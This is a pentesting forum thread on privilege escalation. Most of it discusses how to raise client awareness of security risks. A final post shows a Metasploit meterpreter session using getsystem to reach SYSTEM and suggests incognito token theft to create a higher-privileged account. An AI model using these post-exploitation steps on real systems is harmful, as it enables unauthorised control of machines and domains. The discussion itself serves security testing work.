Privilege excalation



User avatar

Hero Member
Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Mon Aug 23, 2010 7:42 pm

Re: Privilege excalation

H1t M0nk3y wrote:As long as you can scare your clients, you know/hope they will fix their things.

It's never about "scaring" clients believe it or not. Raising awareness to them goes a hell of a lot longer. Most clients nowadays are aware of the risks but won't fully understand the extent of them.

Today I had to sit through a presentation with the owner of my company and a "Tony Robbins" like salescoach (for lack of better explanation) and explain to him in not-so-technical terms what it is I can do (we as a company). I explained to him briefly the differences in extrusion and intrusion detection systems fail as do firewalls. I had to tone it down to make things understood (the risks).

After explaining it to him, he sort of got it but was shocked at the speed at which I could get into machines/networks. Now, this doesn't make me "uberhacker" on the contrary I could say it makes some clients, uberlackingincommon sense. Take a look at a vast majority of what people are calling "insider threats." Does someone clicking on a loaded link (backdoored pdf, doc, html link etc) constitute an insider attack? You bet it down. Remember a reverse shell is someone connecting TO THE attacker. Kiss your firewall goodbye (when done properly.)

Awareness goes a long way. Client's don't want to be scared and its not where you want them to be. Scared people don't think straight ;) Besides they've already heard this routine time and time again: "Buy this firewall, guaranteed to stop...", "Oh you need this shiny sparkly blinky-light IPS", "What you really need is DLP" and the list goes on. What people REALLY need is awareness. Expressing this to a client is guaranteed to always keep you in mind with them.

Think about that for a bit... If it were you and you were speaking to say a family member, friend, colleague, golfing buddy etc., would you remember someone who scared you or someone who made you think in a more positive light?


User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Mon Aug 23, 2010 8:54 pm

Re: Privilege excalation

Sorry sil for my previous post. Engligh isn't my mother tongue and although I rare use this as an excuse, I really made a mistake.

I think exactly like you. I hate scaring people because, like you said, they start acting in panic mode. They also start to look at you with doubts. So I am sorry for what I wrote, I didn't mean that at all.

But again, we do different things. While you are a pentester, I work more with developers. They may not be IT security experts, but most of them can handle some technical stuff. They may not know the difference between a bind and a reverse shell, but they know it's a shell.

When you show to a developer that, for example, you were able to get a shell on the server through SQL injection because they didn't validate user input, they get scared! They understand enough to be scared.

So I really meant that, once you can demonstrate to them the risks associated with their action, and they realize the impact of these risks (and therefore, their actions), then they become aware like you said (and some scared a bit I guess).

But you are right, if I go see a car mechanic and he tells me: "You are crazy driving this car with almost no breaks. See how close you came to kill your family!!!", I wouln'd like it. I would much prefer him to tell me: "You really need to consider fixing your break ASAP. Here's how we can do it".

Thanks sil for explaining me you point so nicely!  ;)
(aka H1t.M0nk3y)


User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Sat Aug 28, 2010 6:19 am

Re: Privilege excalation

Also if we're talking network level shell (not webapp/php/etc) Metasploit has some built in privilege escalation exploits in the priv module (meterpreter) and after patch tues a few weeks ago more should be coming ;)

meterpreter > use priv
Loading extension priv…success.

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.

-h Help Banner.
-t The technique to use. (Default to ‘0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
…got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Also, Depending on your specific permission level you can use incognito to token steal from a domain admin or user and add a new account for yourself with higher privs.

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 2 guests

Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software